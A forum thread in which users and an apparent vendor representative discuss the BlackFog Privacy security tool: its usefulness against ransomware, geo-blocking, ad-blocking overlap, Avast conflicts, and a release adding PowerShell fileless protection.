PrivaZer wipes Reliability History on my machines anyway so I can't answer that. Paul, Control Panel > System Security > Review your computer's status > Maintenance > View Reliability History.
It should list your 'real' win updates as well. (and all errors, it's a great little built-in tool) Just hit the windows start flag and immediately start typing reliability... (no need to use the search box)
Darren - a request. Would it be possible to add (task bar) Install Mode - Permanent on / off option, instead of just current 10 min option?
Question for you Paul. why would you want to turn off execution prevention entirely? It's a lot more than just some directories. Its specific apps as well double extension prevention etc. Just trying to understand the need.
I daily reserve time to update all my apps and portable apps, and this often takes more than 10 minutes. I don't want to have to set install for 10 minutes more than once, or have BFP reactivate during an update. I prefer to control it manually. NVT ERP, for example, has options 10 mins, 30 mins, 1 hr, until reboot, and permanently. Just the latter addition would be OK (for me at least).
Thanks for the response. I totally forgot to read the paper, but it's quite a lot of info. Can you perhaps give examples of malware that BFP can block from connecting out? Personally I'm mostly interested in behavior blockers that can block malware from achieving their goals even when they are already running in memory, so that's why I was a bit skeptical about BPF at first. Think of anti code-injection, keystroke encryption and file/folder protection, but I guess that isn't the focus of BFP.
Hi Rasheed. To me if they are running at all it's too late. I've been giving a lot of thought to this and this product in particular as how it relates to ransomware. Apologies to Darren but people need to think about this. 1. As was pointed out earlier, something can be dropped anywhere on your system. Nuff said. 2. Waiting until a connection is made outbound is way way too late. a) I installed Blackfog in VM and tested Ransomware against it. Outbound may have been stopped, but all three(I stopped after that) had a field day encrypting everything. b) These malwares aren't sitting there innocently waiting for an outbound connection. They all installed themselves in the Windows Startup key. Some of them even install scripts in registry keys for use later. The guys at emsisoft are trying to help someone who got hit by ransomware, paid the fee, got the key but didn't get all the files back. The ONLY protection against these thieves is to keep them out in the first place. Outbound protection just isn't the solution.
I fully agree with Peter. Prevention is definitely better than the cure. In many cases there is no cure once the damage has been done. Is this product even meant to be a defense against Ransomware in the first place? I've read some of the post in this thread, and it seems to me that a good outbound firewall that has good leak protection will achieve the same goal. What type of threats does this product mitigate?
Disregard my last post. I see that Darren has stated it does have execution prevention. I guess they will keep developing it, and improving it to have better detection over time. I guess it is using some behavior blocking to mitigate malicious executions. Maybe in time it will mature.
As for blocking ads and profiling, the only time BFP blocks anything is when I disable uBlock Origin. Of course it could be said that I could remove uBO but I think uBO is currently blocking more than BFP. I know BFP works at a system level but apparently I don't have anything on my machines sending ads or trying to profile me. uBO is a LOT cheaper too.
so while our focus is definitely outbound blocking, that is not the only thing we are doing. We use a layered approach, like execution blocking, ad / tracking block and a number of other behavioral techniques, so its not a single layer that will protect you, but all of them together. Each day we continue to add more layers so you will only see it improve. Each ransomware variant works differently. Our next level of fileless protection is focused on powershell scripts, so that will add yet another layer.
Agreed. The ransomware needs to be stopped in it's tracks. It is great that it stops your data from going to a C&C server somewhere overseas but you are left with files encrypted on your system. For people like us in the tech field it's not too bad as we have data/system backups etc. For the average joe who is not tech savvy they will lose everything, or have to go to Best Buy and pay God knows how much to get their systems cleaned, and likely not get there data back. I have been watching this thread off and on for the past few weeks and have been tempted to give it a go, but just seeing Peter's experience alone is enough for me to not even bother installing it.
Interesting, I am not really interested in the ad blocking, as I have uBO with uMatrix - and AdGuard - active . But I still see Ads and Profiling blocked:
I'm not using uBlock Origin but I'm using the AdGuard Extension for Edge and still see Ads and Profiling with BFP.
@Darren Williams Is there still a issue with Avast ? https://www.blackfog.com/knowledge-base/threat-detection-warning-using-avast-anti-virus/ As I'm using Avast Internet Security on this system, I have not noticed a threat protection event related to this. It looks like BFP interface has changed should I uncheck "Suspicious Address" I have seen some errors in the ProgramData log which I will send via PM. Regards
I have the same red dots on my Traffic Map ... Darren, what is the significance of these? I was wondering if BFP is maybe somehow blocking AdGuard (Russian) hence Ronald and I are seeing ad-blocking?
Not to sure about AdGuard, but you are able to block by country "Network > Geography" Note China, Russia and Ukraine are blocked by default in BFP. Edit: Added Thumbnail
Here are a few answers, the red dots represent the regions blocked through Geography area, the black ones represent the actual traffic. If Avast is using direct IP's then yes it will be a problem with the default settings, as that is a big no no. So unchecking the Suspicious Address option will allow that. If they also route through Russia you can uncheck Russia option. If you want to turn off all geo blocking entirely you can use the Geography option in the Blocked settings area. If the Ad blocking is on it should block the ads through any browser. Now there maybe a few here and there that are new that haven't been picked up yet, but the team is constantly updating the rules for these. If you have a site that had ads you shouldn't see you are welcome to PM me and I can send it to the team to review. There are new Ad companies popping up every day. One other point here is that if you are using another Ad Blocker, they will not be blocked twice, so the first one that catches it (the one in the plugin) will get it first which is why you wont see it in BF.
Regarding blocking IP based on region- this is very nice, but should never be considered to be all inclusive: 1). If anyone remembers the massive Credit Card breaches at Home Depot and Target, in both cases the breach was discovered only after a number of months- it was found (by serendipity) that pulse outbound transmissions were being made to Servers somewhere on the Steppes of Central Asia. Both HD and Target were "protected" by SEP which, although logging the event(s), did not block them. Geographical transmission preclusion would have saved much grief and hundreds of millions of dollars. 2). On the other hand seemingly legitimate Servers can be utilized by BlackHats to cover their tracks, examples being the CCleaner fiasco (the C&C being a CubeMotion server in Los Angeles), many Bankers using CloudFlare (USA), and a bunch of ransomware using the Amazon Farm in Northern Virginia (down the Block and around the Corner from Langley). So yeah, it is a good idea to block stuff depending on region, but just doing this does not make life Rainbows and Unicorns...
Note we have now released version 3.4.0 which adds support for PowerShell Fileless protection. Release notes are as follows: Added PowerShell Fileless protection to Network options Privilege escalation Obfuscation Encoded commands Remote download Remote execution Mimikatz/Powersploit toolkits Compiled PowerShell PowerShell DLL injection Improved SQL performance on multiple inserts Improved handling of foreign language character sets Fixed possible buffer overflow in notifications Improved refresh rates on client when changing geofence on Enterprise console
While it will work you will not get as many resolved domains in the hosts tab as before. This is not a problem for most functionality because we actually use raw IP's for most protection, but it will limit the protection for NON HTTP/s traffic because we won't be able to extract the domain name easily. Again this won't really affect the application very much, its more about visually seeing the traffic in the UI. The next release (3.5) will have less of an issue because we will not be using DNS very much anyway.